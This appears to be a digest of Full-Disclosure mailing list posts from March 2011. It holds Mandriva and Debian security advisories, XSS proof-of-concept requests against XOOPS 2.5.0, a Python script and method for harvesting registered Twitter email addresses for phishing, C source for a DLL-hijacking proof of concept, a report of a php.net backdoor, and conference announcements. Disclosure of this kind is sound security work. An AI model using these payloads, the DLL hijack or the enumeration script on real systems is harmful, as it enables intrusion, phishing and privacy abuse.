[Full-disclosure] [ MDVSA-2011:047 ] proftpd
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2011:047 http://www.mandriva.com/security/ ___ Package : proftpd Date: March 18, 2011 Affected: 2010.0, 2010.1 ___ Problem Description: A vulnerability was discovered and corrected in proftpd: Integer overflow in the mod_sftp (aka SFTP) module in ProFTPD 1.3.3d and earlier allows remote attackers to cause a denial of service (memory consumption leading to OOM kill) via a malformed SSH message (CVE-2011-1137). Additionally for Mandriva Linux 2010.0 proftpd was upgraded to the same version as in Mandriva Linux 2010.2. The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1137 ___ Updated Packages: Mandriva Linux 2010.0: 8e491a641c66bfd2233376fc5c79c3ae 2010.0/i586/proftpd-1.3.3-0.1mdv2010.0.i586.rpm 4456b728c212a896862828d86eb6f3ef 2010.0/i586/proftpd-devel-1.3.3-0.1mdv2010.0.i586.rpm 001e46cc5f36ba64c9ae20d1ba4c4801 2010.0/i586/proftpd-mod_autohost-1.3.3-0.1mdv2010.0.i586.rpm a3bebc84c79fc1e011187cb743ec901e 2010.0/i586/proftpd-mod_ban-1.3.3-0.1mdv2010.0.i586.rpm 5792da80041ca987653271bc927e8e48 2010.0/i586/proftpd-mod_case-1.3.3-0.1mdv2010.0.i586.rpm d9546d0b534932554a415dad8eda61e4 2010.0/i586/proftpd-mod_ctrls_admin-1.3.3-0.1mdv2010.0.i586.rpm 67fca9fe7447a7b71ea380b56e4d6dbb 2010.0/i586/proftpd-mod_gss-1.3.3-0.1mdv2010.0.i586.rpm 9682701d0dc44de6ae8823f3b751f2a3 2010.0/i586/proftpd-mod_ifsession-1.3.3-0.1mdv2010.0.i586.rpm 375fe3abc5ed0c8ed59216a15b54817d 2010.0/i586/proftpd-mod_ldap-1.3.3-0.1mdv2010.0.i586.rpm 21b9fbab449567331679a4582cf2299f 2010.0/i586/proftpd-mod_load-1.3.3-0.1mdv2010.0.i586.rpm 3ddacfaa23963c922e2ba3ce1e75d398 2010.0/i586/proftpd-mod_quotatab-1.3.3-0.1mdv2010.0.i586.rpm 74e71e1de83accce2c55857768c5f034 2010.0/i586/proftpd-mod_quotatab_file-1.3.3-0.1mdv2010.0.i586.rpm 1a671f16b84f12fb65ec2452868561eb 2010.0/i586/proftpd-mod_quotatab_ldap-1.3.3-0.1mdv2010.0.i586.rpm effc2ceebc34839377f8faa9b992d5a2 2010.0/i586/proftpd-mod_quotatab_radius-1.3.3-0.1mdv2010.0.i586.rpm 9c9f0a8bba8de8dfe52e5418adae37d7 2010.0/i586/proftpd-mod_quotatab_sql-1.3.3-0.1mdv2010.0.i586.rpm 36b793ff943513dafedb1cf4fb950623 2010.0/i586/proftpd-mod_radius-1.3.3-0.1mdv2010.0.i586.rpm 65413a1eb94c91f729c9569e79df6b11 2010.0/i586/proftpd-mod_ratio-1.3.3-0.1mdv2010.0.i586.rpm f7e94d2c4b3a707ac74c3c7a0dec7026 2010.0/i586/proftpd-mod_rewrite-1.3.3-0.1mdv2010.0.i586.rpm 4ca434ff1754ef12561607d5edd9a22f 2010.0/i586/proftpd-mod_sftp-1.3.3-0.1mdv2010.0.i586.rpm f2e73feb4cb1e23c78043469b2517a2c 2010.0/i586/proftpd-mod_shaper-1.3.3-0.1mdv2010.0.i586.rpm d628bee7746f0c583436f06c3d87a3ce 2010.0/i586/proftpd-mod_site_misc-1.3.3-0.1mdv2010.0.i586.rpm 10c1949441e8995a6cfd29115b2d1eca 2010.0/i586/proftpd-mod_sql-1.3.3-0.1mdv2010.0.i586.rpm a0797d6f775a3594981b1445fbbf3f2b 2010.0/i586/proftpd-mod_sql_mysql-1.3.3-0.1mdv2010.0.i586.rpm b0b9c84cd77dcb2acafb196b8a98d9d7 2010.0/i586/proftpd-mod_sql_postgres-1.3.3-0.1mdv2010.0.i586.rpm 45d41896bd0ca0bb0d824c032f461dd3 2010.0/i586/proftpd-mod_time-1.3.3-0.1mdv2010.0.i586.rpm 25a1af43cbcb4aa74391f0a3a2b339f8 2010.0/i586/proftpd-mod_tls-1.3.3-0.1mdv2010.0.i586.rpm 226cf260eb3d6460c071b4b7c0f074a7 2010.0/i586/proftpd-mod_vroot-1.3.3-0.1mdv2010.0.i586.rpm f528d0ff77b7a9ffd5f5733db64bb676 2010.0/i586/proftpd-mod_wrap-1.3.3-0.1mdv2010.0.i586.rpm aa1d74b81a020c4463385babc0c99a2f 2010.0/i586/proftpd-mod_wrap_file-1.3.3-0.1mdv2010.0.i586.rpm d5c34155b8267f4b7ebd490a790637c3 2010.0/i586/proftpd-mod_wrap_sql-1.3.3-0.1mdv2010.0.i586.rpm ba10d155a3f958e5d07b08aa2d242a1e 2010.0/SRPMS/proftpd-1.3.3-0.1mdv2010.0.src.rpm Mandriva Linux 2010.0/X86_64: 21e5304dbfaba0456df4fcdf07c6146f 2010.0/x86_64/proftpd-1.3.3-0.1mdv2010.0.x86_64.rpm bf81f5f838416e8ad6be026c72b96d77 2010.0/x86_64/proftpd-devel-1.3.3-0.1mdv2010.0.x86_64.rpm 99ac6d0ca6b7325a9d037c04c337d9cf 2010.0/x86_64/proftpd-mod_autohost-1.3.3-0.1mdv2010.0.x86_64.rpm 3bffd5be09b9042c4da02a6ec51191d1 2010.0/x86_64/proftpd-mod_ban-1.3.3-0.1mdv2010.0.x86_64.rpm 4f945c34baf41cd0955932a1dc616c6a 2010.0/x86_64/proftpd-mod_case-1.3.3-0.1mdv2010.0.x86_64.rpm 6822a142ddcdb057f66c2e76652e860d 2010.0/x86_64/proftpd-mod_ctrls_admin-1.3.3-0.1mdv2010.0.x86_64.rpm 47785c7468636e0e3a0bc232b23ad760 2010.0/x86_64/proftpd-mod_gss-1.3.3-0.1mdv2010.0.x86_64.rpm 317a739c1cfd6d6675b7bb03c030d3fb 2010.0/x86_64/proftpd-mod_ifsession-1.3.3-0.1mdv2010.0.x86_64.rpm e1360da80add4ce853070dc967bdd2d1
[Full-disclosure] XOOPS 2.5.0 = Cross Site Scripting Vulnerability
XOOPS 2.5.0 = Cross Site Scripting Vulnerability 1. OVERVIEW The XOOPS 2.5.0 and lower versions were vulnerable to Cross Site Scripting. 2. BACKGROUND XOOPS is an acronym of eXtensible Object Oriented Portal System. It's the #1 Content Management System (CMS) project on www.sourceforge.net and a recipient of several awards, and constantly places as finalist in various CMS and Open Source competitions. It incorporates many modules such as forums, photo galleries, calendars, article management etc. 3. VULNERABILITY DESCRIPTION Several parameters such as module/module[], memberslist_id[], newname[], oldname[] were not properly sanitized upon submission to the /modules/system/admin.php url, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser. 4. VERSIONS AFFECTED XOOPS 2.5.0 and lower 5. PROOF-OF-CONCEPT/EXPLOIT Parameter: module http://attacker.in/xoops/modules/system/admin.php?fct=modulesadminop=installmodule=pm%3Cimg%20src=a%20onerror=alert%28String.fromCharCode%2888,83,83%29%29%3Eaawe Parameter: module[] [REQUEST] POST /xoops/modules/system/admin.php HTTP/1.1 Host: attacker.in Connection: close Referer: http://attacker.in/xoops/modules/system/admin.php?fct=modulesadmin Cookie: PHPSESSID=b11e32946cf66e9a6391ccbad34453af; xoops_user=1-549115432fcb56150b18bef08004f77d; Content-Type: application/x-www-form-urlencoded Content-Length: 100 op=confirmmodule%5b%5d=1scriptalert(1)/scriptsubmit=Submitoldname%5b1%5d=Systemfct=modulesadminnewname%5b1%5d=System [/REQUEST] Parameter: memberslist_id[] [REQUEST] POST /xoops/modules/system/admin.php HTTP/1.1 Host: attacker.in Connection: close Referer: http://attacker.in/xoops/modules/system/admin.php?fct=usersselgroups=2 Cookie: PHPSESSID=b11e32946cf66e9a6391ccbad34453af; xoops_user=1-549115432fcb56150b18bef08004f77d; Content-Type: application/x-www-form-urlencoded Content-Length: 94 memberslist_id%5b%5d=scriptalert(1)/scriptop=action_groupSubmit=selgroups=1fct=mailusersedit_group=add_group [/REQUEST] Parameter: newname[] [REQUEST] POST /xoops/modules/system/admin.php HTTP/1.1 Host: attacker.in Connection: close Referer: http://attacker.in/xoops/modules/system/admin.php?fct=modulesadmin Cookie: PHPSESSID=b11e32946cf66e9a6391ccbad34453af; xoops_user=1-549115432fcb56150b18bef08004f77d; Content-Type: application/x-www-form-urlencoded Content-Length: 100 op=confirmmodule%5b%5d=1submit=Submitoldname%5b1%5d=Systemfct=modulesadminnewname%5b1%5d=Systemscriptalert(1)/script [/REQUEST] Parameter: oldname[] [REQUEST] POST /xoops/modules/system/admin.php HTTP/1.1 Host: attacker.in Connection: close Referer: http://attacker.in/xoops/modules/system/admin.php?fct=modulesadmin Cookie: PHPSESSID=b11e32946cf66e9a6391ccbad34453af; xoops_user=1-549115432fcb56150b18bef08004f77d; Content-Type: application/x-www-form-urlencoded Content-Length: 100 op=confirmmodule%5b%5d=1submit=Submitoldname%5b1%5d=Systemscriptalert(1)/script1bf8581e3dcfct=modulesadminnewname%5b1%5d=System [/REQUEST] 6. SOLUTION Upgrade to XOOPS 2.5.1 or higher 7. VENDOR XOOPS Development Team http://xoops.org 8. CREDIT This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2011-03-10: notified vendor 2011-03-16: vendor released fixed version 2011-03-18: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/[xoops_2.5.0]_cross_site_scripting Vendor Announcement: http://xoops.org/modules/news/article.php?storyid=5851 What XSS Can Do: http://yehg.net/lab/pr0js/view.php/What%20XSS%20Can%20Do.pdf XSS FAQs: http://www.cgisecurity.com/articles/xss-faq.shtml XSS (wiki): http://en.wikipedia.org/wiki/Cross-site_scripting XSS (owasp): http://www.owasp.org/index.php/Cross-site_Scripting_(XSS) OWASP Top 10: http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project CWE-79: http://cwe.mitre.org/data/definitions/79.html #yehg [2011-03-18] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2011:048 ] krb5
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2011:048 http://www.mandriva.com/security/ ___ Package : krb5 Date: March 18, 2011 Affected: 2010.1, Enterprise Server 5.0 ___ Problem Description: A vulnerability was discovered and corrected in krb5: The MIT Kerberos 5 Key Distribution Center (KDC) daemon is vulnerable to a double-free condition if the Public Key Cryptography for Initial Authentication (PKINIT) capability is enabled, resulting in daemon crash or arbitrary code execution (which is believed to be difficult) (CVE-2011-0284). The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0284 http://web.mit.edu/kerberos/www/advisories/MITKRB5-SA-2011-003.txt ___ Updated Packages: Mandriva Linux 2010.1: 89a5146c09e531a05db7839dedb0a339 2010.1/i586/krb5-1.8.1-5.4mdv2010.2.i586.rpm a4fbd4e66104d0b025ca5af74042f21a 2010.1/i586/krb5-pkinit-openssl-1.8.1-5.4mdv2010.2.i586.rpm 52d37491abb6044371064e031e3f782c 2010.1/i586/krb5-server-1.8.1-5.4mdv2010.2.i586.rpm 6420550804a52d0cc7602b0d6ce43dd9 2010.1/i586/krb5-server-ldap-1.8.1-5.4mdv2010.2.i586.rpm a272a19cb39e01caa81f076e98e77b18 2010.1/i586/krb5-workstation-1.8.1-5.4mdv2010.2.i586.rpm 9f1c62745a31910be6574d41b513fff9 2010.1/i586/libkrb53-1.8.1-5.4mdv2010.2.i586.rpm d3f252a3ee7c998fb475e8c847568f64 2010.1/i586/libkrb53-devel-1.8.1-5.4mdv2010.2.i586.rpm 2148b8ff4cb03a84b7394a09ce8e374c 2010.1/SRPMS/krb5-1.8.1-5.4mdv2010.2.src.rpm Mandriva Linux 2010.1/X86_64: 5fb7896e15aabb6413b5a4a8eb389de2 2010.1/x86_64/krb5-1.8.1-5.4mdv2010.2.x86_64.rpm 87a70bdae97ff07485761ef2825f9af9 2010.1/x86_64/krb5-pkinit-openssl-1.8.1-5.4mdv2010.2.x86_64.rpm 8b533208a389cdc53ef1c7ae175441a7 2010.1/x86_64/krb5-server-1.8.1-5.4mdv2010.2.x86_64.rpm bc1962507833f15e4dff3f02b3827caa 2010.1/x86_64/krb5-server-ldap-1.8.1-5.4mdv2010.2.x86_64.rpm b1592aca21fa62525b3ee0d47eca9359 2010.1/x86_64/krb5-workstation-1.8.1-5.4mdv2010.2.x86_64.rpm 6007c476bbe0ed6b77157d01bc71fd56 2010.1/x86_64/lib64krb53-1.8.1-5.4mdv2010.2.x86_64.rpm 3855f3d0ab75f54ebf4dc05f42efed3c 2010.1/x86_64/lib64krb53-devel-1.8.1-5.4mdv2010.2.x86_64.rpm 2148b8ff4cb03a84b7394a09ce8e374c 2010.1/SRPMS/krb5-1.8.1-5.4mdv2010.2.src.rpm Mandriva Enterprise Server 5: 99f05c23d6049230037ab6fef72b61c2 mes5/i586/krb5-1.8.1-0.5mdvmes5.2.i586.rpm 23bdfb95ae19f56fc5e719cc1a480260 mes5/i586/krb5-pkinit-openssl-1.8.1-0.5mdvmes5.2.i586.rpm 848f15a20fa86057cfdbe2b60c095987 mes5/i586/krb5-server-1.8.1-0.5mdvmes5.2.i586.rpm 485c559ae048ba13e50950b3868a7946 mes5/i586/krb5-server-ldap-1.8.1-0.5mdvmes5.2.i586.rpm 534efaed5cc1a76d53277ac07d7759b4 mes5/i586/krb5-workstation-1.8.1-0.5mdvmes5.2.i586.rpm 93411c0c22cf9d0346b0d3bc8f032db4 mes5/i586/libkrb53-1.8.1-0.5mdvmes5.2.i586.rpm b40b3bca351d0468893c30dc42174c4c mes5/i586/libkrb53-devel-1.8.1-0.5mdvmes5.2.i586.rpm 79c72436e944990111e6a801166c06b6 mes5/SRPMS/krb5-1.8.1-0.5mdvmes5.2.src.rpm Mandriva Enterprise Server 5/X86_64: 53eb81cf4d662f16fef45c6c89a48bbb mes5/x86_64/krb5-1.8.1-0.5mdvmes5.2.x86_64.rpm ae27d729c6a9fd714aaed4ad3692d72d mes5/x86_64/krb5-pkinit-openssl-1.8.1-0.5mdvmes5.2.x86_64.rpm eff836f154bf1364b5b10be1c80e1373 mes5/x86_64/krb5-server-1.8.1-0.5mdvmes5.2.x86_64.rpm f22c47a5a4127a1ebb6dcf4e3d8ae8b8 mes5/x86_64/krb5-server-ldap-1.8.1-0.5mdvmes5.2.x86_64.rpm 159e5d962bbb0614fcdeaebd3df3575e mes5/x86_64/krb5-workstation-1.8.1-0.5mdvmes5.2.x86_64.rpm ad752198fef0ad908eb3e436dec68e82 mes5/x86_64/lib64krb53-1.8.1-0.5mdvmes5.2.x86_64.rpm 80d6aa2d81a91e36ba81725e511b850c mes5/x86_64/lib64krb53-devel-1.8.1-0.5mdvmes5.2.x86_64.rpm 79c72436e944990111e6a801166c06b6 mes5/SRPMS/krb5-1.8.1-0.5mdvmes5.2.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com
[Full-disclosure] [SECURITY] [DSA 2192-1] chromium-browser security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2192-1 secur...@debian.org http://www.debian.org/security/ Giuseppe Iuculano March 15, 2011 http://www.debian.org/security/faq - - Package: chromium-browser Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2011-0779 CVE-2011-1290 Several vulnerabilities were discovered in the Chromium browser. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2011-0779 Google Chrome before 9.0.597.84 does not properly handle a missing key in an extension, which allows remote attackers to cause a denial of service (application crash) via a crafted extension. CVE-2011-1290 Integer overflow in WebKit allows remote attackers to execute arbitrary code via unknown vectors, as demonstrated by Vincenzo Iozzo, Willem Pinckaers, and Ralf-Philipp Weinmann during a Pwn2Own competition at CanSecWest 2011. For the stable distribution (squeeze), these problems have been fixed in version 6.0.472.63~r59945-5+squeeze4 For the testing distribution (wheezy), these problems will be fixed soon. For the unstable distribution (sid), these problems have been fixed version 10.0.648.133~r77742-1 We recommend that you upgrade your chromium-browser packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iEYEARECAAYFAk1/lHMACgkQNxpp46476ao/EwCdFThT2dtAQ9HB8yza9Z4gIqV4 FeIAn3zISoa/86EhpLs5qjhMB9gQ6Oc0 =QJZP -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 2193-1] libcgroup security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2193-1 secur...@debian.org http://www.debian.org/security/ Thijs Kinkhorst March 16, 2011 http://www.debian.org/security/faq - - Package: libcgroup Vulnerability : several Problem type : local Debian-specific: no CVE ID : CVE-2011-1006 CVE-2011-1022 Debian Bug : 615987 Several issues have been discovered in libcgroup, a library to control and monitor control groups: CVE-2011-1006 Heap-based buffer overflow by converting list of controllers for given task into an array of strings could lead to privilege escalation by a local attacker. CVE-2011-1022 libcgroup did not properly check the origin of Netlink messages, allowing a local attacker to send crafted Netlink messages which could lead to privilege escalation. The oldstable distribution (lenny) does not contain libgroup packages. For the stable distribution (squeeze), this problem has been fixed in version 0.36.2-3+squeeze1. For the testing distribution (wheezy) and unstable distribution (sid), this problem will be fixed soon. We recommend that you upgrade your libcgroup packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.10 (GNU/Linux) iQEcBAEBAgAGBQJNgSa1AAoJEOxfUAG2iX577XUIAJP6D0PL63DYGPQCuOafRPF/ dIrmXVLztDsor2GmhkgNl1O7bDjAZ1I/TN/pjSjqZaRWUYCyNeUmk62+t+6PlZCz KEZgz92s6k0EzjEYSZw84hyaxp15neqwlGYxpX1cfOcpZEV2bN6+b9HEYoxZI2h5 fhBfFzVists0vquz15BoLMFEtjCPYODlPoc5zyZpmrAvLinl6xBzVJ6fHdDNB1yM tyBJCgWQ/Iu+XY2ntP/oJjFQ62Ztig/J94u6C2ixvyYUiOsUgLJspddjAQN5YFyW cgOEWnJhcqmWSPdyPuhblz/l4s2sR3ftPxnrxb0abtnPVJB41SO7h9PAc2UnRwU= =Is0K -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 2194-1] libvirt security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2194-1 secur...@debian.org http://www.debian.org/security/ Thijs Kinkhorst March 18, 2011 http://www.debian.org/security/faq - - Package: libvirt Vulnerability : insufficient checks Problem type : local Debian-specific: no CVE ID : CVE-2011-1146 Debian Bug : 617773 It was discovered that libvirt, a library for interfacing with different virtualization systems, did not properly check for read-only connections. This allowed a local attacker to perform a denial of service (crash) or possibly escalate privileges. The oldstable distribution (lenny) is not affected by this problem. For the stable distribution (squeeze), this problem has been fixed in version 0.8.3-5+squeeze1. For the testing distribution (wheezy), this problem will be fixed soon. For the unstable distribution (sid), this problem has been fixed in version 0.8.8-3. We recommend that you upgrade your libvirt packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.10 (GNU/Linux) iQEcBAEBAgAGBQJNgw2+AAoJEOxfUAG2iX57AyEIAIKiPeyIGmkNf9ghME6ZylBl sOnwF/Y4BfDbOQjlEzT/TXYOXoNSzBqrwUZyuk0N5gkuAWdwqSZv8NW+dMFtJtqx GTdxdQAnahwsKoFKjTGd+C+u1lew1SnjuaTD8fAPyONTXimdasz0JGkJCflnkYe1 LQ4zUFxmDphgdLB+dl2IJedG8j4NAAxHz407oY8wEkie4VwWo1O/YZlOyo5ZBkDl BKync5ecQx5TDEI8q+6BWmucUiapn9Dt1JLVzDjFy2WT6SjGbqGeJ/69tOALk6Sz iFyhL0UoxdoQ90fWV1FHGAgG+yypklRqZIQq3e3lUGxU3eQRHDil37zpJokAvl4= =0RVC -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Using Twitter for Phishing Campaign / Spam / Followers?
This conceptual flaw exists in most web apps which have a reset password by email address feature, as most will display an error if the email address does not exist in their database. On Tue, Mar 15, 2011 at 12:19 PM, Reverse Skills cont...@reverseskills.comwrote: Simple and easy way to get a list of email accounts used on Twitter. For Phishing campaigns, custom Spam... Twitter has been notified and I suppose someday be fixed if they think there should be filtered. When you create a new Twitter account, the form requesting a mailing address. Twitter verify that the email account is not being used, but does not check any user token or limit the usage (captcha/block). https://twitter.com/signup - http://twitter.com/users/email_available?email= We just need to automate it with a simple script , ***Everything you do will be your responsibility*** --- #!/usr/bin/python import sys, json, urllib2, os f = urllib2.urlopen(http://twitter.com/users/email_available?email= +sys.argv[1]) data = json.load(f) def valid() .. Email has already been taken in data [msg] -- reply .. --- We just need a list of users to test.. for example : http://twitter.com/about/employees (don't be evil is just an example!) Parsing the name/nickname and testing the {user}@twitter.com a few minutes later we have a list of ~ 400 valid internal email *@twitter.com. An attacker could probably.. a brute force attack (Google Apps), would send Phishing or try to exploit some browser bugs or similar. #Aurora #Google. Most of these e-mail are internal, not public.. There are also some that make you think they are used to such A-Directory system users : .. apa...@twitter.com r...@twitter.com m...@twitter.com .. But, if you download a database Rockyou / Singles.org / Gawker / Rootkit.com or just a typical dictionaries and domains will be quite easy to get hold of a list of users large enough (*@hotmail.com, *@gmail.com, etc).For example in my case I used to find user accounts in a pentest of a company that used Twitter. But probably not a good idea to allow unlimited access, a malicious user could use these user lists for Spam or Phishing. -- Security Researcher http://twitter.com/revskills -- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Using Twitter for Phishing Campaign / Spam / Followers?
Agreed. These public API methods should have brute force protection at the very least. But, because they want instant in-line form validation for email address availability, this makes it difficult. In an ideal world, they'd have a CAPTCHA on the form, and only validate upon submit with valid captcha. On Tue, Mar 15, 2011 at 3:02 PM, Reverse Skills cont...@reverseskills.comwrote: The problem is to allow unlimited access to that resource, not the resource itself. 2011/3/15 Cal Leeming c...@foxwhisper.co.uk: This conceptual flaw exists in most web apps which have a reset password by email address feature, as most will display an error if the email address does not exist in their database. On Tue, Mar 15, 2011 at 12:19 PM, Reverse Skills cont...@reverseskills.com wrote: Simple and easy way to get a list of email accounts used on Twitter. For Phishing campaigns, custom Spam... Twitter has been notified and I suppose someday be fixed if they think there should be filtered. When you create a new Twitter account, the form requesting a mailing address. Twitter verify that the email account is not being used, but does not check any user token or limit the usage (captcha/block). https://twitter.com/signup - http://twitter.com/users/email_available?email= We just need to automate it with a simple script , ***Everything you do will be your responsibility*** --- #!/usr/bin/python import sys, json, urllib2, os f = urllib2.urlopen(http://twitter.com/users/email_available?email= +sys.argv[1]) data = json.load(f) def valid() .. Email has already been taken in data [msg] -- reply .. --- We just need a list of users to test.. for example : http://twitter.com/about/employees (don't be evil is just an example!) Parsing the name/nickname and testing the {user}@twitter.com a few minutes later we have a list of ~ 400 valid internal email *@twitter.com. An attacker could probably.. a brute force attack (Google Apps), would send Phishing or try to exploit some browser bugs or similar. #Aurora #Google. Most of these e-mail are internal, not public.. There are also some that make you think they are used to such A-Directory system users : .. apa...@twitter.com r...@twitter.com m...@twitter.com .. But, if you download a database Rockyou / Singles.org / Gawker / Rootkit.com or just a typical dictionaries and domains will be quite easy to get hold of a list of users large enough (*@hotmail.com, *@gmail.com, etc).For example in my case I used to find user accounts in a pentest of a company that used Twitter. But probably not a good idea to allow unlimited access, a malicious user could use these user lists for Spam or Phishing. -- Security Researcher http://twitter.com/revskills -- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- -- Security Researcher http://twitter.com/revskills -- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Free Screen To Video V1.2 DLL Hijacking Exploit (iacenc.dll)
Hi guys, You can find the software affected at : http://www.koyotesoft.com/appli/Setup_FreeScreenVideo.exe Thanks, Metropolis /* # Exploit Title: Free Screen To Video V1.2 DLL Hijacking Exploit (iacenc.dll) # Date: 15/03/2011 # Author: Metropolis # Url: http://metropolis.fr.cr # Software Link: http://www.koyotesoft.com/appli/Setup_FreeScreenVideo.exe # Version: V1.2 # Tested on: Microsoft Windows XP Professional SP3 (FR) # Instructions: # 1. Compile dll # gcc -shared -o iacenc.dll FreeScreenVideo.c # 2. Add iacenc.dl # C:\Program Files\Free Screen To Video # 3. Launch FreeScreenVideo.exe # 4. MessageBox DLL Hijacked! */ #include windows.h BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { switch (fdwReason) { case DLL_PROCESS_ATTACH: dll_mll(); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } int dll_mll() { MessageBox(0, DLL Hijacked!, DLL Message, MB_OK); }___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] The Lots of Sex Risk and Security Project
Hi, I posted a new article: https://www.infosecisland.com/blogview/12596-The-Lots-of-Sex-Risk-and-Security-Project.html There's some interesting info in there for pen testers who ply social engineering or phishing tactics. But if you can come to the Troopers con (troopers.de) at the end of the month, I'll be there discussing a lot of these techniques in depth as well giving examples of many, many more. Sincerely, -pete. -- Pete Herzog - Managing Director - p...@isecom.org ISECOM - Institute for Security and Open Methodologies www.isecom.org - www.osstmm.org www.hackerhighschool.org - www.badpeopleproject.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] php.net compromised and php source backdoored
Hi Someone report a security incident about php.net http://www.wooyun.org/bugs/wooyun-2010-01635 The picture show that some php.net site was compromised,and hacker backdoored php source :) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Password Security Presentation
Hi all, Here is the copy of my recent presentation 'Primer on Password Security' @ IIT Guwahati ISEA Security Conference http://securityxploded.com/download/ISEA_IIT_Guwahati_2011_Password_Security_Presentation.zip You can find complete coverage about the event here http://tinyurl.com/6esq8us Cheers Nagareshwar http://SecurityXploded.com http://PasswordForensics.com/ http://twitter.com/securityxploded ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Materials regarding Cyber-war
On 03/13/2011 07:13 PM, 김동욱 wrote: I'm looking for information or materials about cyberwar between nations for research purpose. Check out /Inside Cyber Warfare/ by Jeffrey Carr, published by O'Reilly. A little over a year old, it talks most of the higher profile pre-2010 cyberwar events. http://oreilly.com/catalog/9780596802165 It's a good read. In it, he republishes a paper by a military officer on dealing with cyber events and their legal ramifications. hope that helps, K -- Ovi Mail: Making email access easy http://mail.ovi.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] OWASP AppSec USA 2011 Call For Papers
The OWASP AppSec USA 2011 Call for Papers (CFP) is now open. Visit the following URL to submit your abstract for the September 22-23, 2011 talks in Minneapolis, Minnesota: http://www.appsecusa.org/talks.html We're excited to announce that speakers will be in good company with our first keynote, OWASP founder Mark Curphey, who will run with the theme of Community - The Killer App, much in the spirit of recent SXSW keynote Christopher Poole (see http://www.wired.com/underwire/2011/03/christopher-moot-poole/). The CFP will close June 14, 2011. We look forward to talk submissions over the coming months from security practitioners, researchers, thought leaders, and developers in the following content areas: * Cloud Security * Mobile Security * Secure SDLC * OWASP Projects (turbo talks) * Software Architecture Patterns for Security * Software Development Platform Tutorials * New Attacks Defenses * Thought Leadership (executive panels, interviews, and speeches) Speakers will receive free admission (nontransferable) to the conference in return for delivering a 50 minute talk or for delivering a 25 minute OWASP Projects turbo talk. Thanks, and have a great weekend! OWASP AppSec USA 2011: Your life is in the cloud. September 20-23 Training, Talks, CTF, and Showroom www.appsecusa.org @appsecusa ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and 